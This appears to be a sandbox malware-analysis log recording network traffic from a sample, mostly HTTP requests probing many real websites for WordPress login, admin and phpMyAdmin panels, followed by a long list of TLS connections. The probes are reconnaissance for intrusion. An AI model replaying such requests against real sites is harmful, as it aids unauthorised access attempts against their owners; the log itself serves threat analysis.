Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.maxiv.lu.seAccept: */*Accept-Encoding: deflate, gzipCookie: ff59ae34f86788aafc83adbd6fbb16ab=573a080441b430e46540f849b8105044User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.maxiv.lu.se/
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: tradeavenida.comAccept: */*Accept-Encoding: deflate, gzipCookie: _cfuvid=LvH4Xrnl0rVYyhoO4XsyXtrl76eVXmaMNVuqhXVgIEc-1700978385041-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: www.bunasta.euAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://bunasta.eu/wp-login.php
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: knu.ac.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.knu.ac.in/wp-login.php
Source: global trafficHTTP traffic detected: GET /admin/pages/ HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: coralparkchristian.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp/wp-login.php HTTP/1.1Host: www.ceuandalucia.esAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: samson.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: k8spersistent=5afd37c218f5676376cb43a26fed2bbc|11f187638643e13d7bd1963991fac52b; OF=8jsqh0b6dova9dpfri4i3ad415User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: daisyokogyo.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Flumaruniformes.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: lumaruniformes.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /Security/login?BackURL=%2Fadmin%2Fpages%2F HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=qn6eh6oumdk5qmj0m5efhe7rurUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.maxiv.lu.seAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: himontessori.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: engel-firm.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: talentius.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma HTTP/1.1Host: gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipCookie: PublishedSiteSession=eyJpdiI6Ik5ObEFRd1R1Zi9HT0oxV2Ircm5UQ2c9PSIsInZhbHVlIjoicURnaEVheXRneW9LMExZd0ZVKzFSYkhteHBSSitDM05jMVF2ZWhOZGJ1TTBkNkFFdi9ZaTN0RVBRTU9GUFM2a0hibWNlYTltcDBJczk3cThMRklYbjBESVh1S1lYbEFIbDAzeS9mbmpzRURJbnAzM3RsdWJsM2tRQUMvQ1ExL3giLCJtYWMiOiI3ZDdiZTY1OTI1YTQ0M2YyMzE2NjE4MTdjNTcyOGY4ZDdkNzNiYzgwNTJmMjA0MWI3Mjc5NjIyMjYzN2M3MmZiIiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6Im5SMUR5aGVYRzk5eVNWOVlBMjdGT2c9PSIsInZhbHVlIjoialJJbk1nRlhJdHVqUlovcjZvNHlVaTlWMWFMTUd2RG5TVFVCekxiU25vcjBGTSt5UWNlRDRiT1BuNWR1WVg0OG5RSVhrblVqcmI0SGpsRjhBNnFtR3NZODdNVEx4RUFxaHgyaFhyUjRXTzhuQ1hsbTNleU1PcUkwUXhQWExZazkiLCJtYWMiOiIyMmJkMjM0YTE0OWMxOWZjYWU0MGE1NTc4OTE1NzNkNGEzNzRhNTY4YjVlMmE5OTNkMTAyYjQ4ZWU2ZWE5NDdkIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6IlJrY2ZQV0RLNEsvZ3BJNUk0VFF1dkE9PSIsInZhbHVlIjoibFFjeElYVkxjYWFLc0UwczNUSUZFeEtvNm5OSmN1M0lpQ2doUHJFUzBqVnRpWUZsWEk1aE92YTVGVmVINUpFWWN4YjM5M29WSHFLb29SNlMvUWFsU09FaFR5blJOV0VVMHYrL3JaTGF6bVY1KzdFeGxxa1dxQUZGUC9rNGF4UGQiLCJtYWMiOiIyOWRkODg5NWE1ZWZiODk5MjM0YjZkMTNkZGZhNjcxMGViOWQyMGVlOWM1OWQyZWY4YzA5YWQ2YjFmZjYzYWY2IiwidGFnIjoiIn0%3DUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipCookie: PublishedSiteSession=eyJpdiI6Ii9jTlJlSTdIWDBqUjEwQkxxQ08weUE9PSIsInZhbHVlIjoiUExnZVdPTGtiWGxNS0xlOHc2YzFtQXNkaGp0bHUyb1I3K2FsNDR2UzJSSld0VGtPbGEybFZEMll6VHZRUFgzK0pTMldRczdXeWkxV20xd0VSRzlyaFliYWVWMFZWRUhVQ2Ixb1NwY3d3NTlyUk1ESHhFOTg1cmVxMHp5VE9QQW4iLCJtYWMiOiIwNjY5NDEyZmY4NTJjNmI4ZjA4ZGEwNjlkMjliZDBhNGJmMzdhYmMzMjcxZWVlNTJkODhmZTlhYTMxMjA4OTRkIiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6IjlLZ3o3ZitXTkJMMTc1MHBUSTZrd0E9PSIsInZhbHVlIjoiTTN5QlA4M2RDQmFXR1F6WnV0MjVLRGUyTC82bzlvYnBRSlBuaXJMME96WnZrYjYxL1NRNm1TUFFoREFUOStoM0hRRTNkVGZqa2M5bW5QT21lbG50NmpZcS9kK2ZvWGpoRkhMRzZGekcwaU9kaEV5N29GaTNtQ2oyczZXbEZYaWciLCJtYWMiOiI0NTU5ZTk1NGViNDFjZTAwNWIzZGYyMzEwZjg2YmJlN2JjODZkMzcyNGU0ZGMwMGU1ZjAyMDE1ZDk5ODVmODlhIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6IkJqLzRuT0dNWE1NT1lhV3g3TzdmOHc9PSIsInZhbHVlIjoiVHJuQWlySXVLTURJWG5zd1JjcXFaQzMvQ2ZrRGVhMlZyK0hyL3RkYk9qbXFFaFZPejJmS3J1dDFaYmVIL0xYQTg2RWZxc0xBVitoRU56dHdyMnB3R0c3V29kTmkxdzZaZFkxVmdjdjhucHcyR1ZSY1hrSVA0NGdXSGYwT09QbmwiLCJtYWMiOiIzZDQ1MTNkMDg5OWE3OTQ3NmE3YmM5N2YwMGI3OTI1N2Q2YTM2YjcwZGEzNzJiMDIxMTNkMDg5NTM1NmVmNTU4IiwidGFnIjoiIn0%3DUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: tradeavenida.comAccept: */*Accept-Encoding: deflate, gzipCookie: _cfuvid=LvH4Xrnl0rVYyhoO4XsyXtrl76eVXmaMNVuqhXVgIEc-1700978385041-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: tradeavenida.comAccept: */*Accept-Encoding: deflate, gzipCookie: _cfuvid=tDrWrpYz0sQSHfLN2QI5clVhMz.ytyo40IGQr8aDz4A-1700978385868-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: gruporegiosafety.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.harasduberry.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: tiswheels.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: www.knu.ac.inAccept: */*Accept-Encoding: deflate, gzipCookie: laravel_session=eyJpdiI6IjhxTUZQUlJiWjZFZnVkTkdlVzBJT1E9PSIsInZhbHVlIjoiK2pwQ2VQblNuTkxzcTE4aGRCVmQ1cTZHVVlVODhEL1hyaXBSMUx2azFoUmVkdXdYSFhEQzFnK1ZzTGdnR1Y5d1RrZU4rNlB1d2RlMDZ0a2RiNExSV25STnBUZEFoS1p4OGVacDdUckdxazdmL3hDOWtZaFJpUHJiSnRPQUlzbjciLCJtYWMiOiI4NjI2OGU4MDVhZmY1ZDg2Yjk0ZGY0NDhkMTQxNzAyMDZmNTNhNDUyYWZhYzVmZWQwYTVhYTU5M2RjMzVhNzdmIn0%3D; XSRF-TOKEN=eyJpdiI6IjFVQUlOU0JNOEkvUDBEKytURkN5V0E9PSIsInZhbHVlIjoiUllCNGk4WHF2aTloUjJpZHBmSzZHU0RZMWRHYmY1eEdWd1AxRFlVZTd5RVpjTXE4bE9PRktraFNYem9JbWtBRFVYc2tzME9QM3VRVXg0cWpScjFRak1JdUI1RGxwOG10YVJkMDI5UGY1UW9Ea0hGbUxkM01ycjBFMlYvSUhRRUciLCJtYWMiOiI1OWU0MDk3YTE4MGU1NTZiN2Y4YTkyOGNjY2VmMGNhMGRlNWQ3OTRjNzAzZjM2YWM0YThlZTA5NzgyMTBjM2ZkIn0%3DUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.knu.ac.in/wp-login.php
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: himontessori.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: k8spersistent=1203cc93bf326997096bfdc5c2cf4d3f|11f187638643e13d7bd1963991fac52b; OF=1qiejf8u62psuvsa49d0c1jep6User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: rechagricola.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: my.calvary.qld.edu.auAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: www.grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: k8spersistent=dbce043fd5773e46115905cf1a6992b8|11f187638643e13d7bd1963991fac52b; OF=68racb9qa4tcicisten4cggps0User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin/pages/ HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getquipu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /Security/login?BackURL=%2Fadmin%2Fpages%2F HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=afubt268smo3j604dfnlk2tqckUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: rechagricola.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:50256 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.237.190.156:443 -> 192.168.2.4:50350 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.234.162.143:443 -> 192.168.2.4:50333 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:50671 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.111.240.6:443 -> 192.168.2.4:50136 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:50933 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.230.63.107:443 -> 192.168.2.4:51000 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.230.63.171:443 -> 192.168.2.4:51068 version: TLS 1.2
Source: unknownHTTPS traffic detected: 44.219.53.183:443 -> 192.168.2.4:50497 version: TLS 1.2
Source: unknownHTTPS traffic detected: 159.203.32.4:443 -> 192.168.2.4:50603 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.241.224.218:443 -> 192.168.2.4:50766 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:50997 version: TLS 1.2
Source: unknownHTTPS traffic detected: 139.162.169.45:443 -> 192.168.2.4:50950 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.208.26.152:443 -> 192.168.2.4:50961 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:50953 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.241.62.220:443 -> 192.168.2.4:50951 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.200.30.31:443 -> 192.168.2.4:51631 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.202.203.176:443 -> 192.168.2.4:50971 version: TLS 1.2
Source: unknownHTTPS traffic detected: 74.220.219.189:443 -> 192.168.2.4:51058 version: TLS 1.2
Source: unknownHTTPS traffic detected: 191.6.210.8:443 -> 192.168.2.4:50999 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.246.24.211:443 -> 192.168.2.4:51675 version: TLS 1.2
Source: unknownHTTPS traffic detected: 78.128.62.138:443 -> 192.168.2.4:51486 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.235.200.147:443 -> 192.168.2.4:51752 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.96.211.44:443 -> 192.168.2.4:51781 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.54.192.125:443 -> 192.168.2.4:51774 version: TLS 1.2
Source: unknownHTTPS traffic detected: 92.62.143.50:443 -> 192.168.2.4:51761 version: TLS 1.2
Source: unknownHTTPS traffic detected: 109.168.109.224:443 -> 192.168.2.4:51627 version: TLS 1.2
Source: unknownHTTPS traffic detected: 120.88.73.238:443 -> 192.168.2.4:51386 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:52336 version: TLS 1.2
Source: unknownHTTPS traffic detected: 103.224.212.226:443 -> 192.168.2.4:52342 version: TLS 1.2
Source: unknownHTTPS traffic detected: 148.66.138.193:443 -> 192.168.2.4:50955 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.226.37.158:443 -> 192.168.2.4:52329 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.132.45:443 -> 192.168.2.4:53656 version: TLS 1.2
Source: unknownHTTPS traffic detected: 117.20.63.148:443 -> 192.168.2.4:51886 version: TLS 1.2
Source: unknownHTTPS traffic detected: 67.205.16.72:443 -> 192.168.2.4:55011 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:53665 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.235.14.141:443 -> 192.168.2.4:55160 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:55052 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.83.33.36:443 -> 192.168.2.4:55178 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.230.63.186:443 -> 192.168.2.4:55227 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.40.150.54:443 -> 192.168.2.4:55174 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:55292 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:53670 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.210.96.117:443 -> 192.168.2.4:55326 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.47.252.115:443 -> 192.168.2.4:55230 version: TLS 1.2
Source: unknownHTTPS traffic detected: 99.81.150.60:443 -> 192.168.2.4:55269 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.144.64.233:443 -> 192.168.2.4:55288 version: TLS 1.2
Source: unknownHTTPS traffic detected: 72.167.58.161:443 -> 192.168.2.4:55239 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.168.2.4:55239 -> 72.167.58.161:443 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:55181 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:55235 version: TLS 1.2
Source: unknownHTTPS traffic detected: 164.52.221.51:443 -> 192.168.2.4:55067 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.234.155.54:443 -> 192.168.2.4:55166 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.247.74.107:443 -> 192.168.2.4:55442 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.96.186.206:443 -> 192.168.2.4:55508 version: TLS 1.2
Source: unknownHTTPS traffic detected: 76.223.105.230:443 -> 192.168.2.4:55713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 81.19.159.64:443 -> 192.168.2.4:55510 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.124.249.13:443 -> 192.168.2.4:55832 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.136.104.255:443 -> 192.168.2.4:55523 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.214.252.247:443 -> 192.168.2.4:55485 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.63.202:443 -> 192.168.2.4:55789 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.164.64.246:443 -> 192.168.2.4:55811 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.183.156.218:443 -> 192.168.2.4:55795 version: TLS 1.2
Source: unknownHTTPS traffic detected: 81.169.145.157:443 -> 192.168.2.4:55792 version: TLS 1.2
Source: unknownHTTPS traffic detected: 191.252.51.5:443 -> 192.168.2.4:55516 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:55995 version: TLS 1.2
Source: unknownHTTPS traffic detected: 159.203.32.4:443 -> 192.168.2.4:56010 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.200.30.31:443 -> 192.168.2.4:56194 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:56215 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.132.45:443 -> 192.168.2.4:56241 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.83.33.36:443 -> 192.168.2.4:56280 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.235.14.141:443 -> 192.168.2.4:56272 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.40.150.54:443 -> 192.168.2.4:56294 version: TLS 1.2
Source: unknownHTTPS traffic detected: 72.167.58.161:443 -> 192.168.2.4:56295 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:56500 version: TLS 1.2
Source: unknownHTTPS traffic detected: 78.128.62.138:443 -> 192.168.2.4:56290 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:56271 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:56573 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.144.64.233:443 -> 192.168.2.4:56382 version: TLS 1.2
Source: unknownHTTPS traffic detected: 67.205.16.72:443 -> 192.168.2.4:56630 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.202.203.176:443 -> 192.168.2.4:56356 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.7.37:443 -> 192.168.2.4:56608 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:56639 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.136.104.255:443 -> 192.168.2.4:56292 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.228.96.142:443 -> 192.168.2.4:56484 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:56825 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:56935 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.111.240.6:443 -> 192.168.2.4:56357 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:56824 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.208.26.152:443 -> 192.168.2.4:56808 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:56827 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.240.130.5:443 -> 192.168.2.4:56951 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.240.130.5:443 -> 192.168.2.4:56954 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.54.192.125:443 -> 192.168.2.4:56707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 141.193.213.11:443 -> 192.168.2.4:57025 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:56805 version: TLS 1.2
Source: unknownHTTPS traffic detected: 92.62.143.50:443 -> 192.168.2.4:56711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:57122 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.83.33.36:443 -> 192.168.2.4:57219 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.246.24.211:443 -> 192.168.2.4:57220 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:56708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:57010 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:56703 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.235.14.141:443 -> 192.168.2.4:57320 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.54.192.125:443 -> 192.168.2.4:57148 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:57304 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:56702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 67.205.16.72:443 -> 192.168.2.4:57541 version: TLS 1.2
Source: unknownHTTPS traffic detected: 120.88.73.238:443 -> 192.168.2.4:57021 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:57317 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.47.252.115:443 -> 192.168.2.4:57547 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.47.252.115:443 -> 192.168.2.4:57546 version: TLS 1.2
Source: unknownHTTPS traffic detected: 76.223.105.230:443 -> 192.168.2.4:57699 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.132.45:443 -> 192.168.2.4:57721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:57806 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.32.208.27:443 -> 192.168.2.4:57780 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:57660 version: TLS 1.2
Source: unknownHTTPS traffic detected: 72.167.58.161:443 -> 192.168.2.4:57697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 81.19.159.64:443 -> 192.168.2.4:57703 version: TLS 1.2
Source: unknownHTTPS traffic detected: 74.220.219.189:443 -> 192.168.2.4:57704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:57773 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.210.96.117:443 -> 192.168.2.4:58082 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:58189 version: TLS 1.2
